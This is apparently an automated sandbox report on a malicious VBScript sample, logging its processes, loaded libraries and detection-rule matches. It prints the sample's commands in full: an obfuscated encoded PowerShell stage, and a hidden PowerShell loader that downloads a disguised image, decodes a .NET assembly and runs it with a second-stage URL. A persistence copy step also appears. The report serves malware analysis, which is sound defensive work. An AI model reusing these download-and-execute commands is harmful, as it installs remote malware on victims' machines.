        Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD344816C93_2_00007FFD344816C9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD344825FA3_2_00007FFD344825FA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD3446181F7_2_00007FFD3446181F
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD344625FD7_2_00007FFD344625FD
        Source: kam.vbsInitial sample: Strings found which are bigger than 50
        Source: Process Memory Space: powershell.exe PID: 2672, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 616, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.spre.troj.expl.evad.winVBS@11/10@3/2
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\c2iY1[1].txtJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sexmt3mt.pll.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kam.vbs"
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kam.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbsJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
